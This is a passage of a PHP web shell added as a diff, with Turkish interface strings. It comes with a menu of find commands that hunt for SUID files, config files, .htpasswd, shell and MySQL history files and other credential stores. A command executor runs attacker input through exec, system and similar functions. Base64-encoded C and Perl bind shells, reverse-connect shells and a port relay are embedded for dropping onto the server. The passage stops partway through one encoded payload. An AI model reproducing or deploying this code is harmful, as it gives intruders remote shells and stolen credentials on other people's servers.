+'eng_text45'=>'Dosya Kaydedildi',
+'eng_text46'=>'PHPinfo Goster',
+'eng_text47'=>'php.ini dosyasinda ki degiskenleri goster',
+'eng_text48'=>'Temp dosylarini sil',
+'eng_butt11'=>'Dosya Duzenle',
+'eng_text49'=>'Server dan bu scripti sil',
+'eng_text50'=>'CPU bilgisini incele',
+'eng_text51'=>'Memory[hafiza] bilgisini incele]',
+'eng_text52'=>'Metin Bul',
+'eng_text53'=>'Dizin icinde',
+'eng_text54'=>'Dosyalarda ki metni bul',
+'eng_butt12'=>'Bul',
+'eng_text55'=>'Sadece dosyalarda ki',
+'eng_text56'=>'Bulunmadi :( KeyCoder :)',
+'eng_text57'=>'Olustur/Sil Dosya/Dizin',
+'eng_text58'=>'isim',
+'eng_text59'=>'dosya',
+'eng_text60'=>'dizin',
+'eng_butt13'=>'Olustur/Sil',
+'eng_text61'=>'Dosya Olustur',
+'eng_text62'=>'Dizin Olustur',
+'eng_text63'=>'Dosya Sil',
+'eng_text64'=>'Dizin Sil',
+'eng_text65'=>'Olustur',
+'eng_text66'=>'Sil',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Uygula',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Metin Bul',
+'eng_text73'=>'Klasor Bul',
+'eng_text74'=>'Dosya Bul',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Metin ara dosyalarin icinde arama yoluyla',
+'eng_text77'=>'Database yapisini Goster',
+'eng_text78'=>'Tablolari Goster',
+'eng_text79'=>'Sutunlari Goster',
+'eng_text80'=>'Cesit',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'SQL sorgusu yap',
+'eng_text84'=>'SQL sorgusu',
+);
+/*
+&#1040;&#1083;&#1080;&#1072;&#1089;&#1099; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;
+&#1055;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1090; &#1080;&#1079;&#1073;&#1077;&#1078;&#1072;&#1090;&#1100; &#1084;&#1085;&#1086;&#1075;&#1086;&#1082;&#1088;&#1072;&#1090;&#1085;&#1086;&#1075;&#1086; &#1085;&#1072;&#1073;&#1086;&#1088;&#1072; &#1086;&#1076;&#1085;&#1080;&#1093; &#1080; &#1090;&#1077;&#1093;-&#1078;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;. ( &#1057;&#1076;&#1077;&#1083;&#1072;&#1085;&#1086; &#1073;&#1083;&#1072;&#1075;&#1086;&#1076;&#1072;&#1088;&#1103; &#1084;&#1086;&#1077;&#1081; &#1087;&#1088;&#1080;&#1088;&#1086;&#1076;&#1085;&#1086;&#1081; &#1083;&#1077;&#1085;&#1080; )
+&#1042;&#1099; &#1084;&#1086;&#1078;&#1077;&#1090;&#1077; &#1089;&#1072;&#1084;&#1080; &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1090;&#1100; &#1080;&#1083;&#1080; &#1080;&#1079;&#1084;&#1077;&#1085;&#1103;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;.
+*/
+$aliases=array(
+'Uygun Dosyalari bul'=>'find / -type f -perm -04000 -ls',
+'Genel uygun dosyalari dizinlerde bul'=>'find . -type f -perm -04000 -ls',
+'sgid dosyalari bul'=>'find / -type f -perm -02000 -ls',
+'sgid uygun dosyalari dizinlerde bul'=>'find . -type f -perm -02000 -ls',
+'config.inc.php dosyalarini bul'=>'find / -type f -name config.inc.php',
+'config.inc.php dosyalarini dizinlerde bul'=>'find . -type f -name config.inc.php',
+'config* dosyalarini bul'=>'find / -type f -name "config*"',
+'config* dosyalarini dizinlerde bul'=>'find . -type f -name "config*"',
+'Yazilabilir Dosyalari bul'=>'find / -type f -perm -2 -ls',
+'Yazilabilir Dosyalari dizinlerde bul'=>'find . -type f -perm -2 -ls',
+'Yazilabilir klasorleri bul'=>'find /  -type d -perm -2 -ls',
+'Yazilabilir butun klasorleri dizinlerde bul'=>'find . -type d -perm -2 -ls',
+'Yazilabilir dosya ve klasorleri bul'=>'find / -perm -2 -ls',
+'Yazilabilir butun dosya ve klasorleri dizinlerde bul'=>'find . -perm -2 -ls',
+'Butun service.pwd dosyalarini bul'=>'find / -type f -name service.pwd',
+'service.pwd dosyalarini genel dizinlerde bul'=>'find . -type f -name service.pwd',
+'Butun .htpasswd dosyalarini bul '=>'find / -type f -name .htpasswd',
+'.htpasswd dosylarini genel dizinlerde bul'=>'find . -type f -name .htpasswd',
+'Butun .bash_history dosyalarini bul'=>'find / -type f -name .bash_history',
+'.bash_history dosyalarini genel dizinlerde bul'=>'find . -type f -name .bash_history',
+'Butun .mysql_history dosyalarini bul'=>'find / -type f -name .mysql_history',
+'.mysql_history dosyalarini genel dizinlerde bul'=>'find . -type f -name .mysql_history',
+'Butun .fetchmailrc dosyalarini bul'=>'find / -type f -name .fetchmailrc',
+'.fetchmailrc dosylarini genel dizinlerde bul'=>'find . -type f -name .fetchmailrc',
+'Linux uzerinde erisilebilinen sistem dosyalarini listele'=>'lsattr -va',
+'Acilan portlari goster'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=FixedSysy color=gray>&#1080;</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1079;&#1072;&#1087;&#1080;&#1089;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] HATA! Dosya yazilabilir de?il ! "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1087;&#1088;&#1086;&#1095;&#1080;&#1090;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] HATA! Dosyayi okuma izni yok! "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "&#1053;&#1077; &#1091;&#1076;&#1072;&#1083;&#1086;&#1089;&#1100; &#1089;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100; "; }
+else { $text = "Olusturulamadi "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
